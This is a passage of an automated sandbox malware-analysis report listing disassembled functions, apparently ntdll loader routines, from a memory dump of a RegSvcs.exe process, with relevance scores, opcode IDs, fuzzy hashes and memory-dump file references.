Instruction Fuzzy Hash: 2241D632A046519FCB29CE9CD8C0AA67BE4EF49650F06855DED8AD7B53D730D800CB91

Function 0117096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01172DF0: LdrInitializeThunk.NTDLL(011AE73E,0000005A,0120D040,00000020,00000000,0120D040,00000080,01194A81,00000000,?,?,00000002,00000000,?,?,0117AE00), ref: 01172DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01170D74

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 88f0790da08c59dcc3639357b6d83ecc19bd8e7f0172a6feb6a6a6f373f35b28
Instruction ID: 5bbc92a196f0a04557fe03ebbd3a866c6a9303af66ec10db269181e3101e1f0d
Opcode Fuzzy Hash: 88f0790da08c59dcc3639357b6d83ecc19bd8e7f0172a6feb6a6a6f373f35b28
Instruction Fuzzy Hash: BC426C75900715DFDB29CF28C840BAABBF5FF09314F1445AAE9899B341E770AA84CF61

Function 0115EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25aace5b13a15b135551b4cbafa9b1f0557036569c4c5f75390b4564ddab0394
Instruction ID: c475691a51223b0bb7d739caa8394bf552161aba6ca338adafa57d48cdf105f3
Opcode Fuzzy Hash: 25aace5b13a15b135551b4cbafa9b1f0557036569c4c5f75390b4564ddab0394
Instruction Fuzzy Hash: AFE12071D00609DFCF69CFA9D984AADBBF1FF48304F24452AE966A7261D770A842CF11

Function 0113EA80 Relevance: 6.1, Strings: 4, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 0113EB62
T, xrefs: 0113EB4E
, xrefs: 0113F299
{, xrefs: 01194643

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: $R$T${
API String ID: 0-4276472446
Opcode ID: b5487bae760befed334de6dab55ab0d7e6228d183007cb49fec859b2f469e71b
Instruction ID: 71c0f66ca94aabbbbc4877c4db518339a95cf4757636f75f4969735932ea0152
Opcode Fuzzy Hash: b5487bae760befed334de6dab55ab0d7e6228d183007cb49fec859b2f469e71b
Instruction Fuzzy Hash: C0A24774E0562A8BDF68CF18C9887ADBBB5AF85304F1442E9D91DA7254DB309E86CF01

Function 01164C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 01164CC3
Flst, xrefs: 01164C96

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 141762d2373b655d90b8e198b9dc780734741f7073f3b4069ace3b102c8bc05e
Instruction ID: 02c61e9e215307cd05754a50b580c91d8722a59ae826df9a46009c853ea6478c
Opcode Fuzzy Hash: 141762d2373b655d90b8e198b9dc780734741f7073f3b4069ace3b102c8bc05e
Instruction Fuzzy Hash: 9B51B9B1E002088FDF2ADF99C4847ADFBF8FF64758F55802AD0599B651EB719981CB80

Function 011B4F40 Relevance: 5.2, Strings: 4, Instructions: 246COMMON

Download Yara Rule

Strings

.Local, xrefs: 011B5170
/, xrefs: 011B4F6D
.DLL, xrefs: 011B50C7, 011B519C
\, xrefs: 011B4F66

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\
API String ID: 0-80926707
Opcode ID: 8b2a784cdf7616e16764d1eec3699f0742ded6a3f87b0035f696368e866fed61
Instruction ID: a357a7a99cf5ede271c495e17baa64ecbfa9c66b290f55fe8f0deac5f1a6aca6
Opcode Fuzzy Hash: 8b2a784cdf7616e16764d1eec3699f0742ded6a3f87b0035f696368e866fed61
Instruction Fuzzy Hash: EF91C172D006199BCB29CF6CC880AEEBBB2FF48310F594169E911E7351E775DA01CB91

Function 0114AD00 Relevance: 4.3, Strings: 3, Instructions: 509COMMON

Download Yara Rule

Strings

DLL search path passed in externally: %ws, xrefs: 011980A6
minkernel\ntdll\ldrutil.c, xrefs: 011980B7
LdrpInitializeDllPath, xrefs: 011980AD

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: DLL search path passed in externally: %ws$LdrpInitializeDllPath$minkernel\ntdll\ldrutil.c
API String ID: 0-109579469
Opcode ID: 5928cce2000e95e7b9f8aa0219f2db7b8111eadd5a14628070c9e5b792be9382
Instruction ID: 4967572be63aed9714b823f634e568a30d2add86dea3f594904bb5d0f248032f
Opcode Fuzzy Hash: 5928cce2000e95e7b9f8aa0219f2db7b8111eadd5a14628070c9e5b792be9382
Instruction Fuzzy Hash: DA120171A083559FD72DDF28D440BAEB7E4BF85B08F06092DF9968B281E734D944CB92

Function 01156962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 0119CA51
@, xrefs: 01156C24

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: ab9bb6a1b0dea2b859b2d7da9d195cbdfc7a9ff41c2b1c103665eca99de440d1
Instruction ID: 7fb1babd780d818f87d0ae4b3233214e04b36dab14b1123ae36ad6109150c742
Opcode Fuzzy Hash: ab9bb6a1b0dea2b859b2d7da9d195cbdfc7a9ff41c2b1c103665eca99de440d1
Instruction Fuzzy Hash: E9C2A071608341DFEB6DCF28C841BABBBE5AF88754F45892DE9E987241D734D804CB92

Function 011304E5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0113055E

Strings

kLsE, xrefs: 01130540

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: kLsE
API String ID: 3446177414-3058123920
Opcode ID: b456118d265caaf160490973abfcdbcea7760724f31956b303afe1d22f55ab34
Instruction ID: 1a17f2f730ec865e8d087a5edb14892ced374dcf523ba635eafdc652f67cef20
Opcode Fuzzy Hash: b456118d265caaf160490973abfcdbcea7760724f31956b303afe1d22f55ab34
Instruction Fuzzy Hash: 8F51BEB15047429FD729EF28C4446A7BBE4AFC8304F10483EFAEA87289E774D545CB92

Function 011B2349 Relevance: 3.6, Strings: 2, Instructions: 1117COMMON

Download Yara Rule

Strings

@, xrefs: 011B2942
@, xrefs: 011B2B74

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: e7b886d6b2d172d055d8eee70780b5813805b377ee39c0ab6f801d57181733ee
Instruction ID: beed454ef2577ef9899c85f85cc66970771ab7ead898c4c1113ead54b31d794d
Opcode Fuzzy Hash: e7b886d6b2d172d055d8eee70780b5813805b377ee39c0ab6f801d57181733ee
Instruction Fuzzy Hash: 9E92A071604742AFE729DF29C884FABB7E8BB88754F04492DFA94D7250D770E848CB52

Function 01164D1D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01164D64

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 011A3640, 011A366C

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3711822496
Opcode ID: e68b7ae2d33083b433cd4f8d5973af750104a70fc8bde9a0385d25c03ac50e1d
Instruction ID: 690579b7a66d544f69bb3d4dbcf235262db29983887b924d991291b17af85ec2
Opcode Fuzzy Hash: e68b7ae2d33083b433cd4f8d5973af750104a70fc8bde9a0385d25c03ac50e1d
Instruction Fuzzy Hash: 51316E32D00211AEEF3EDB0CD848B7D7AACBB31654F074029D91857951D7A1DDA087D5

Function 01174F03 Relevance: 3.0, APIs: 2, Instructions: 28timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01174F1F
RtlDebugPrintTimes.NTDLL ref: 01174F55

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a905ef07e188ad14620045e4136b73a2fcd8b2c2d171e838a374704bdeaed7af
Instruction ID: b781a89292413bf291f80f5b56f16c7f086e163e4d0d330acb086fa75f2a2f22
Opcode Fuzzy Hash: a905ef07e188ad14620045e4136b73a2fcd8b2c2d171e838a374704bdeaed7af
Instruction Fuzzy Hash: E4F03A71148A91DFD338DF14E549B69B3F5FB88704F144839E80687B90D7786D44CB52

Function 01162CF0 Relevance: 2.7, Strings: 2, Instructions: 218COMMON

Download Yara Rule

Strings

.Local\, xrefs: 01162D91
@, xrefs: 01162E4D

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: f1ba5e8b939a0c4822fb51e1aeae2c6792e9a6376c060917bb40bd7953cf9c13
Instruction ID: f11cb09ed1b3a2d5aa509fce3b9b125b2a93a7fa800f30092db277528c7f8bad
Opcode Fuzzy Hash: f1ba5e8b939a0c4822fb51e1aeae2c6792e9a6376c060917bb40bd7953cf9c13
Instruction Fuzzy Hash: AD81DDB15043429FDB1ACF28C890AABBBE8EFA5704F45895DF884DB341D371D954CBA2

Function 01136A50 Relevance: 2.0, APIs: 1, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9e2cf58642d02311dcd0a8eb123f4646b54db8cbf51b88b73c9fd0d4f5e80b
Instruction ID: bc26ffa157de29e9d0751ebdc1bc286011f8ae9a6a18b130cb6202fbd9469b80
Opcode Fuzzy Hash: 9a9e2cf58642d02311dcd0a8eb123f4646b54db8cbf51b88b73c9fd0d4f5e80b
Instruction Fuzzy Hash: 5732CD71A04205EFDB29CF68C480BAEBBF1FF88310F248569E956AB395D734E941CB51

Function 01140770 Relevance: 1.9, APIs: 1, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03ef65da9f3fd2ad788e643b14fddd8553e00c391c46e32f49b7334d53153bf6
Instruction ID: e1a740591e73ea6273a4ff8f129bae5c496b7c540d0f7d618b13d118bd6ffddf
Opcode Fuzzy Hash: 03ef65da9f3fd2ad788e643b14fddd8553e00c391c46e32f49b7334d53153bf6
Instruction Fuzzy Hash: 27F1C070B00606DFEB1ECF69C894BAAB7B2FF48704F1441A9E6169B341D734E981CB91

Function 0113CC74 Relevance: 1.9, Strings: 1, Instructions: 607COMMON

Download Yara Rule

Strings

9, xrefs: 0113CBA1

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2473173378
Opcode ID: 40fab4f5540fbb55203a99053882a21974758f29a9b7610d76863cd31a42370d
Instruction ID: 9b82833ba3e81c990ca5dbdb30ae18cb9f8cf6570798f43226e45cd63299c3bf
Opcode Fuzzy Hash: 40fab4f5540fbb55203a99053882a21974758f29a9b7610d76863cd31a42370d
Instruction Fuzzy Hash: E8424A75E002188BEF28CFA8D480BEDFBB5BF88750F54816AE919AB358D7309D45CB51

Function 0115E5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3f681b4ca8977797d28459d2ed1afa3d0e1412b09401c83ca0284e2ae1d843
Instruction ID: fef7b9354b996cd8741fb802eb744850d706892d90282f7284800f6c9c500688
Opcode Fuzzy Hash: ef3f681b4ca8977797d28459d2ed1afa3d0e1412b09401c83ca0284e2ae1d843
Instruction Fuzzy Hash: 7EA12231E01656EFEF298F98C848FAEBFA4BB04754F054121EE21AB281D7749E41CBD1

Function 0113AF42 Relevance: 1.7, Strings: 1, Instructions: 457COMMON

Download Yara Rule

Strings

#, xrefs: 0119363D

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 53139dadbe123e5d7a6a0c3865e6308a4e034fe7b0c68cf12bc90e21b01765a0
Instruction ID: 90fdba7bfb2227c83804549669bd4b6e5ab13f50543d45788ab22ae7eb1181c6
Opcode Fuzzy Hash: 53139dadbe123e5d7a6a0c3865e6308a4e034fe7b0c68cf12bc90e21b01765a0
Instruction Fuzzy Hash: B102B031A082698BEF2ECA18CC94BEDB7B5BF84340F1141E6D859A7255E7319E818F49

Function 0116CDB1 Relevance: 1.7, APIs: 1, Instructions: 197timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0116CE7D

Memory Dump Source

Source File: 00000007.00000002.2212826279.0000000001126000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true

Associated: 00000007.00000002.2212826279.0000000001100000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001107000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001180000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001186000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.00000000011C2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001223000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2212826279.0000000001229000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1100000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 21c76daa9ae1a80a3c0f25d7f3d852023ded94850372f71abde74fb9e0728d5a
Instruction ID: 1c59a402e8025b3eaed04c04120709504278a6152f2d6ce2d8abc4a694601cab
Opcode Fuzzy Hash: 21c76daa9ae1a80a3c0f25d7f3d852023ded94850372f71abde74fb9e0728d5a
Instruction Fuzzy Hash: F761D175A00216DFCB1DDF68C890BAEBBB9FF48314F118169E511EB291D7319911CF90

Function 011403E9 Relevance: 1.7, APIs: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01194D8A

Memory Dump Source

